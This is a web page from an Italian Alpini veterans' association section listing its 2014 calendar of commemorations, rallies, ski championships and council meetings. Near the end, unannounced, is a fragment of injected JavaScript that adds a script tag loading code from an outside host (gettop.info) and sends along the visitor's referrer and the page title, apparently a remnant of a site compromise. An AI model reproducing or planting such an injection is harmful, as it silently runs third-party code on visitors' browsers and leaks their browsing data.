A.N.A. Sezione Abruzzi

CALENDARIO MANIFESTAZIONI E GARE SPORTIVE SEZIONALI ANNO 2014

dicembre 17th, 2013  |  Published in Manifestazioni, Sport

mese giorno località manifestazione
gennaio 11 Riunione CDN
gennaio 26 Saluzzo Commemorazione Novo Postojalowka Caduti Cuneense (Sez. Saluzzo)
gennaio 27-28-29-30-31 Ca.STA
gennaio 24-25 Brescia 71° Nikolajewka solenne (Sezione Brescia)
febbraio 8 Riunione CDN
febbraio 15-16 Isola del Gran Sasso Commemorazione Seleleny-jar (Sez  Abruzzi
febbraio 16 Lecco 79° Campionato Sci fondo a Piani di Bobbio
marzo 2 Lanzada Val Malenco 37°Campionato sci alpinismo (Sez. Sondrio)
marzo 15 Riunione CDN
marzo 30 San Martino di Castrozza 48° campionato Naz. sci slalom (Sez. Trento)
aprile 5 Riunione CDN
aprile 12-13 Marostica C.I.S.A: (Sez. Marostica)
maggio 9- 10-11- Pordenone 87ª Adunata Nazionale
maggio 24 Riunione CDN
maggio 25 Milano Assemblea Delegati
giugno 5-6-7-8 (gio.ven.sad.dom.) Borgo San Dalmazzo Alpiniadi Estive
giugno 14 Milano Riunione CDN
giugno 28-29 VALLE CASTELLANA ADUNATA 9° ZONA
giugno 29 Contrin Pellegrinaggio (Sez. Trento)
giugno 29 Monte Zurrone Manifestazione Sacrario
luglio 6 Lama Dei Peligni Manifestaze di Gruppo
luglio 6 Col di Nava 65° Raduno Sacrario Cuneense (Sez. Imperia)
luglio 13 Ortigara Pellegrinaggio Nazionale Ortigara (Sez. Asiago)
luglio 19-20 Bagolino (sez Salò) Premio Fedeltà alla Montagna
luglio 19-20 Amatrice Raduno Sezionale
luglio 27 Torrebruna Manifestazione 7° zona
luglio 27 Secinaro Raduno 5° zona
luglio 27 Adamello 51° Pellegrinaggio in Adamello
agosto 31 Taranta Peligna Raduno 7° zona
settembre 6 Riunione C.D.N.
settembre 7 Pasubio Pellegrinaggio  Monte Pasubio (Sez. Vicenza)
settembre 7 Bernadia Pellegrinaggio Monte Bernadia ( Sez. Udine)
settembre 7 Pescocostanzo Raduno 6° zona
settembre 14 Civitella Roveto Raduno  della 3° zona
settembre 14 CAGNANO RADUNO 2° ZONA
settembre 13- 14 Verona Raduno 3° Raggruppamento (Sez. Verona)
settembre 20-21 Linguaglossa (Catania) Raduno 4° Raggruppamento (Sez. Sicilia)
Sez Sicilia
settembre 20-21 Bergamo Raduno disciolte fanfare Brigate Alpine
settembre 27-28 Omegna Raduno 1° raggruppamento (sez. Omegna)
settembre 28 CAPPELLE DEI MARSI MANIFESTAZIONE 3° ZONA
ottobre 5 Bari Pellegrinaggio Sacrario Caduti d’oltremare (Sez. Puglia Basilicata)
ottobre 11 Milano Riunione CDN
ottobre 12 Venezia Festa Madonna del Don (Sez Venezia)
ottobre 18-19 Monza Raduno 2° Raggruppamento (Sez. Monza)
novembre 15 Milano Riunione CDN
novembre 16 Milano Riunione Presidenti sezioni Italia
novembre 16 CASOLI D’ATRI MANIFESTAZIONE DI 9° ZONA
novembre 20 Pietransieri -Roccaraso Comm. “Eccidio dei Limmari”(Gruppo di pietransieri)
dicembre 13 Milano Riunione CDN
dicembre 14 Milano Messa di Natale Duomo

d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Your Comments

L’Alpino d’Abruzzo